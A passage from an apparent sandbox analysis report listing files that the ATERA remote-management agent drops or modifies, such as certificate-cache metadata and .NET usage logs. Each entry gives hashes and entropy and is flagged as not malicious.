                                                                                                                                                                                                                                        Preview:p...... ...........(....(................jr/#.....VX......................VX.... .........0j.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK1N/99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:nkDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                        MD5:830039A3024AC992DE82D72A40978CA0
                                                                                                                                                                                                                                        SHA1:28CD54BBD1B6B520CD81A8C24585B0D50B3B59C2
                                                                                                                                                                                                                                        SHA-256:0597671793A93BBCA7AFFBB320737766146F63ED86104B1D16B7EF0CCB3A65F5
                                                                                                                                                                                                                                        SHA-512:A56BBDFCBEE00C4D8971430CEE4F541CCE7F43909EB687BEE0338408A35FF1EBBC3F05B5A9A51918DA62AFBE28AD9EAF220B224161BFE1392997D0B856B8FF71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ................(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):404
                                                                                                                                                                                                                                        Entropy (8bit):4.020054932007164
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK3VpW04Wc1qzFiQlfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+Kc:NpikBlmxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                        MD5:704646AA8C22B37FC650673CEE244AC6
                                                                                                                                                                                                                                        SHA1:592BD3EEA795B05E0935BBFF19ECEEE0765262C6
                                                                                                                                                                                                                                        SHA-256:7F3214CA7D846FE0E7A13AA87CCAFEEC78555F25B08808EB7490184B7109769D
                                                                                                                                                                                                                                        SHA-512:BA99654B92E80F7EE8B0A0CB6A7918AEEF10B94633D53963FD036E9AEC7A9FF3818906BE655D74F53EE16926CD1085C4E2B738D1AE53E8BB6A3E548847C02DEE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... .... ...*+#;....(..................n?......5.......................5.... ..........L.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):248
                                                                                                                                                                                                                                        Entropy (8bit):2.9770047449304404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:kkFklke2jl1fllXlE/9XlkDxtINRR8WXdA31y+NW0y1YbXKw+l1M7HlYIkWXalWt:kKlI1koFAUSW0PTKDXM+I+0
                                                                                                                                                                                                                                        MD5:67A4ABAC2F8BE1B95A71945EC565D36D
                                                                                                                                                                                                                                        SHA1:2671E1767169D03127BBCB8974756716B11F050B
                                                                                                                                                                                                                                        SHA-256:7970962055B7631410E2A4AB0C949D9FB1617ECA701C49445E3901520AEAC1BC
                                                                                                                                                                                                                                        SHA-512:44267A925FF1A3F618AACF2274904AE227C0D8A7AF1E7220CDDFC06E926B3A18F5BB5DB8E0ABAD033DA4031000086F369A745B533142AC3D676F3239F03751D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....f.....';....(....................................................... ........X2bO... ...................h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.l...".6.6.f.c.7.4.7.0.-.2.e.1."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                        Entropy (8bit):3.206650934253046
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKnqkFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:vtYtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                        MD5:D212D68918EECB1622F5F3B495C8B39B
                                                                                                                                                                                                                                        SHA1:F456A16E12A4AC6735845EF2D80E9C94FA445B39
                                                                                                                                                                                                                                        SHA-256:83610ABF2E5DD937BB0598DE65B7ED0D4C3509899A3D9C28DD0DB7C5E709C6F7
                                                                                                                                                                                                                                        SHA-512:A8B3A490F1CF1034E27574E8BF6CFDFAD17AE8DC939421248DDF85BA47ED222AC8D064A161E0AA4C86749411CA01BC0F265A73A3AE7BE294BD4F5ADA80E55039
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... .........}".....(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                        Entropy (8bit):4.006856445971696
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:hZiXLm7QmxMiv8sFBSfamB3rbFURMOlAkr:h4X9mxxv7Sf13rbQJr
                                                                                                                                                                                                                                        MD5:A7512EF35E482DC433A48CB2488D3FA8
                                                                                                                                                                                                                                        SHA1:3BD41BA4B6B216F5915B9114DB3A4E76878D8C67
                                                                                                                                                                                                                                        SHA-256:5E614BE6786E7456B182EF26AA97184B4A8B5C11E106D17B95D990C59EE2921A
                                                                                                                                                                                                                                        SHA-512:584BA341B437D9EE7D72B00AE2EA61F1889DD717680A61AE98B5984D93EB6F5486DB9EC9B6B4205E811FFE0CFC927DE8A327828A53DABD7B0DF74082BCA1D333
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....(......:....(..................xh....].......................]...... ..........d.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                        Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKcwkzLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:UwkzLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                        MD5:B4B007999401926C55554086C2321204
                                                                                                                                                                                                                                        SHA1:87170D95B0073EE6021F6537ECAACD4864A45089
                                                                                                                                                                                                                                        SHA-256:EEDFB63CBBA97FD23C16D789438F0FA650C48F5460D70C1BAD85EB64DE5F83B9
                                                                                                                                                                                                                                        SHA-512:D6A378C408CE98B5DAACFE23A69FC1F1AF0BA4C5D5A527C15BF005157A29708EE986806C442595F8AC4CEB51176C0658C25ABAF05EB47E7DDB1118A092D43227
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....l.....(.....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1944
                                                                                                                                                                                                                                        Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                        MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                        SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                        SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                        SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1983
                                                                                                                                                                                                                                        Entropy (8bit):5.345248756179348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKksHVsHT6HNHOHKCHKlT40HKe60:iqbYqGSI6oPtzHeqKks1sz6tuqCqZ40T
                                                                                                                                                                                                                                        MD5:F974F0FCD981AC0581C5498C0155EF91
                                                                                                                                                                                                                                        SHA1:0CF6D5F41937B296EF9D37FC90E56EC8458B96DF
                                                                                                                                                                                                                                        SHA-256:500B63AEC50B89EF4CEC9ED49E53D168CDC35D235CB416B84234D3E45F3AC365
                                                                                                                                                                                                                                        SHA-512:1484917CC2A8E88DD4010FEE60394BD974D5C44ED0482DAD64B06A319E1F7E414321B8BDB06C6DE70152CFEA887BBDEFD2F2689C077251E8D2BBC9448FBF8719
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runtime\2702

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMarketplace.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1933
                                                                                                                                                                                                                                        Entropy (8bit):5.355086078533374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk9HhHKe6PfHKWA1eXrHKlT44HK3:iqbYqGSI6oPtzHeqKk9Bq13qhA7qZ44y
                                                                                                                                                                                                                                        MD5:48BE58ECCC69A336811B1F7A06CBB42D
                                                                                                                                                                                                                                        SHA1:97487FBB71E394F03DBBAF0144B8ACF949BC8862
                                                                                                                                                                                                                                        SHA-256:33500DF352C1FB6D3D006FB32E0601EB89B52C79B5D5287213D082D9D19603C7
                                                                                                                                                                                                                                        SHA-512:0A6E33102F09C3F1C0D89D251511FE5FFA5AB153FC0ECE9284D7FAAE3682168717EDE437D761E4EC321D5971D50255D8D3406B63D1E964F5D72DD966C0D44878
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):3043
                                                                                                                                                                                                                                        Entropy (8bit):5.361093730986187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk9HVsHUHhHKe6PfHKWA1eXrHKlT4d6HNHGHPmHKm:iqbYqGSI6oPtzHeqKk91s0Bq13qhA7qp
                                                                                                                                                                                                                                        MD5:7FBB3BC293626F02EEE5D12A2FC44FE7
                                                                                                                                                                                                                                        SHA1:A736DE9B60CEC25864AE995EF046F3F317B5D1AC
                                                                                                                                                                                                                                        SHA-256:B6ED7FB8E1D3A5AB9858099700CDA16766D6F442587CD6F965815CF8AFC1444D
                                                                                                                                                                                                                                        SHA-512:C175AF1525508EEA8DEAE8BE67E4780922492B3D01ACDB36B43220DE5B57898F10558F80C5D6218B61A236D35C41047527C6AD00770F477E23507AAEA7EF2000
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1968
                                                                                                                                                                                                                                        Entropy (8bit):5.358970550932517
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT44HKmHKe6+JHxLHqHvHlu:iqbYqGSI6oPtzHeqKk+qZ44qmq1IRLK4
                                                                                                                                                                                                                                        MD5:C09FFFFF02DC01F97E0F663546856019
                                                                                                                                                                                                                                        SHA1:1D6A7F75E657912BD3A11A99B914C6EE55893A1F
                                                                                                                                                                                                                                        SHA-256:90EC1BADD918380F4C730DC3FBA25DFBD404BFCAD6E7C9D4B256416E79CEF1D8
                                                                                                                                                                                                                                        SHA-512:4DD854F4E833CB55517A7E42FC325B8B20588FDEB87E11F1F764F83E97E4350E30198AB873C5722B0FE42B6FDAD32F0448607CC8F138BBEB8184D3955DC3630C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1499
                                                                                                                                                                                                                                        Entropy (8bit):5.341844552740347
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNWE4KXSE4KlOU4mXE4Ke60:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKl
                                                                                                                                                                                                                                        MD5:D45F0B0387AA9450CC88125F2428C26D
                                                                                                                                                                                                                                        SHA1:8C77259A299BF2FB7A66EC695A3F0EFA5154DCB6
                                                                                                                                                                                                                                        SHA-256:6A6DF19288C76B1CEDD0F507F226705CDE6A69F3AB59B4FC13AF5C7B7F7D12A3
                                                                                                                                                                                                                                        SHA-512:5523AD8087ECE039FFFEF746F9B6175D6C2F2523C372FC813D21E695C18D986432D2B83C23D0E6CD6C42C97DFC8DECE3121BE8907D05337EA9B282D3E947EF4F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075
                                                                                                                                                                                                                                        Entropy (8bit):5.353521172341231
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNa8mE4Dp689:MxHKQwYHKGSI6oPtHTHhAHKKka8mHDpN
                                                                                                                                                                                                                                        MD5:BDADAD127D5A6079C29C0C870A5C3C2C
                                                                                                                                                                                                                                        SHA1:AD5D30886AE959F271CF777D386A31CD792C9A64
                                                                                                                                                                                                                                        SHA-256:7186B9EAC66BD83E5E1C050D81529BC68511538118E65019EBECFD952C22FD55
                                                                                                                                                                                                                                        SHA-512:198087F52C39A32ACE7A90E9212C2AA0F31EDF8349773C8C6C5495CA82C890F9A8A44356AC5AEBB42F3342E6BE981DC4BCFE1D7FB43760745D7240A117257725
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
